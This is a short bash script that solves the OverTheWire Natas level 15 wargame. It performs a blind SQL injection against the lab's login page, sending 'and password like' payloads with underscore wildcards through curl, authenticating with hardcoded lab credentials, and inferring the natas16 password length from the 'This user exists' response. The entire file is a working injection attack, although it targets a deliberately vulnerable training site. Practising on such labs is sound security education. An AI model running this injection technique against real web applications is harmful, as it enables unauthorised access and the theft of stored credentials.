#! /bin/bash
#This user exists.	Executing query: SELECT * from users where username="natas16" and password like "________________________________"
#pass with 33 symb

access="natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J"
site="http://natas15.natas.labs.overthewire.org?debug=1"

data='username=alice" and password like "'
wild="" 

for ((i=0;i<100;i++))
do
  wild="$wild"_
  bruteData="$data""$wild"

  curlOut=$(curl -s -u "$access" "$site" --data-urlencode "$bruteData") 


  final=$(echo "$curlOut" | grep 'Executing query:')
  final=$(echo "$final" | sed 's:<br><div.*::' )
  final=$(echo "$final" | sed 's:\(.*\)<br>\(.*\):\2\t\1:')

  result=$(echo "$curlOut" | grep 'This user exists.' | wc -l)
  if [[ $result = 1 ]]
   then 
        echo "length = "$(($i+1))" ""$final"
        
  fi

done
